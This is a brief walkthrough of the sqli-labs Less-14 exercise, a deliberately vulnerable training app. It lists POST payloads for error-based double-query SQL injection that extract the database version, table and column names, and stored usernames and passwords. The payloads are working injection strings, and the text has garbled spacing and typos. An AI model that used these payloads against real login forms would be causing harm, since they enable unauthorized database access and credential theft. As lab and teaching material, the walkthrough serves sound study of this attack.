Less-14 POST -Double Injection -Single quotes - String -with twist
with Less-13 closed only different ways, is to break through the double injection. The same basic steps.
0x01.
uname=1&passwd=1&submit=Submit
uname=1"&passwd=1&submit=Submit
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1" LIMIT 0,1' at line 1Statement can be given by known closing double quotes
0x02. Access to the database version, database and user
uname = "union select 1,2 from ( select count (*), concat ((select concat (version (), 0x3a, 0x3a, database (), 0x3a, 0x3a, user () , 0x3a) limit 0,1), floor (rand (0) * 2)) x from information_schema.tables group by x) a # & passwd = ') or 1 = 1 # & submit = Submit
0x03. Get table
uname = "union select count (* ), concat ((select concat (table_name, 0x3a, 0x3a) from information_schema.tables where table_schema = 'security' limit 0,1), floor (rand (0) * 2)) as a from information_schema.tables group by a # & passwd = ') or 1 = 1 # & submit = Submit
search other tables, the value can be changed llimit
0x04.获取字段名
uname=" union select count(*),concat((select concat(column_name,0x3a,0x3a) from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit
0x05.查看字段数
uname=" union select count(*),concat((select concat(count(),0x3a,0x3a) from security.users limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit
0x06.获取字段值
uname=" union select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit
